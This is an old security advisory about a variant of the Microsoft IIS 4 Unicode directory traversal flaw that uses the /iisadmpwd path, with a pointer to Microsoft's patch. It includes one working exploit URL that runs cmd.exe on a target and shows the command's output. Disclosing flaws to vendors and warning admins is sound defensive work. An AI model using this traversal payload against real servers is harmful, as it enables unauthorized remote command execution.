===[ www.sinsecurity.net ]=== ====[ Information ]====== Program Name : Microsoft Internet Information Server (IIS) Program Author : http://www.microsoft.com/iis Test Versions : 4, others not vulnerable Advisory Author: Niels Teusink, a.k.a. Nu Omega Tau Contact : [EMAIL PROTECTED] ========================= This advisory was made in Holland. Overview ======== Extended unicode is an exploit found in october 2000 by an unknown person, rfp did further research on this. Later on, variants were found, such as using the /msadc directory instead of /scripts and user different ways of unicode encoding. All these techniques had their pro's and con's, the /scripts method worked on both IIS4 and 5, but didn't work if the wwwroot directory was on a different partition then the winnt directory. The /msadc method solved this as the /msadc directory is in \program files which is usually on the same partition as the winnt dir, the msadc method though doesn't work with IIS5. Both of the methods still had a common flaw, the name of the winnt directory must be known for the exploit to work, with my new method, this isn't the case. My method only works with IIS4 though. For more information on the vulnerability, do a search in the bugtraq archives on www.securityfocus.com with the keyword "Unicode". RainForestPuppy's research can be found at www.wiretrip.net. Problem Description =================== When using the /iisadmpwd which is a subdirectory of the windows nt directory, it is not necessary to specify the windows nt directory. We can just do http://target.machine/iisadmpwd/..%c0%af../cmd.exe?/c+dir as you can see, I don't specify any directory, but get back: Directory of C:\WINDOWS\System32\inetsrv\iisadmpwd 01/01/00 11:11a <DIR> . 01/01/00 11:11a <DIR> .. 01/01/00 11:11p 1,902 achg.htr (...) I can imagine admins scanning their network with home-made scripts for vulnerabilities and only fixing machines where the vulnerabilities are found. When the installation directory is not winnt, the vulnerability wouldn't be detected but still can be exploited if the machine isn't patched. Solution ======== This is not a new problem and DOES NOT require a new patch, if you haven't applied the unicode patch yet because the technique didn't work on your system, it may be a good idea to do so now. The patch can be found at http://www.microsoft.com/Downloads/Release.asp?ReleaseID=23667 Altough this is not a new problem I decided to inform Microsoft of this method before posting this. ===[ Niels Teusink - Sin Security ]=== Don't deface, email! Find the best deals on the web at AltaVista Shopping! http://www.shopping.altavista.com